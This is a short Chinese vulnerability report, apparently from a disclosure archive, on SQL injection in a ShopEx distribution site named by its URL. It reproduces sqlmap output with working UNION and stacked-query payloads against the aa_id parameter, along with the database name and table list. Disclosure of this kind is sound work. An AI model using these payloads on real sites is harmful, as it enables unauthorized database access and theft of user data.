### 简要描述:
ShopEx分销平台sql注入
### 详细说明:
[<img src="https://images.seebug.org/upload/201402/05160141e7aced08aa13321f0ab4d9bcd0c707a6.jpg" alt="1.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/05160141e7aced08aa13321f0ab4d9bcd0c707a6.jpg)
[<img src="https://images.seebug.org/upload/201402/051602327235f66a3683cce2b0e1feeb66984a14.jpg" alt="2.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/051602327235f66a3683cce2b0e1feeb66984a14.jpg)
[<img src="https://images.seebug.org/upload/201402/051604172d58a00196c299ac2e20e2a3d06a75fe.jpg" alt="3.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/051604172d58a00196c299ac2e20e2a3d06a75fe.jpg)
注入点:
```
http://www.fengxiaowang.cn:80/article.php?aa_id=* (GET)
sqlmap identified the following injection points with a total of 184 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: UNION query
Title: MySQL UNION query (NULL) - 7 columns
Payload: http://www.fengxiaowang.cn:80/article.php?aa_id=' UNION ALL SELECT NULL,CONCAT(0x7177726971,0x536248626f76574b6549,0x7178746671),NULL,NULL,NULL,NULL,NULL#
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: http://www.fengxiaowang.cn:80/article.php?aa_id='; SELECT SLEEP(5)--
---
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
web application technology: Nginx, PHP 5.2.13
back-end DBMS: MySQL 5.0.11
Database: b2b_fenxiaowang
[9 tables]
+------------------+
| category |
| data |
| photo |
| photo_extend |
| product_active |
| products |
| products_content |
| products_extend |
| webnews |
+------------------+
```
### 漏洞证明:
部分用户信息:
[<img src="https://images.seebug.org/upload/201402/05160632dbba200178b61397834192818cf72af1.jpg" alt="4.JPG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/05160632dbba200178b61397834192818cf72af1.jpg)
京公网安备 11010502034610号
暂无评论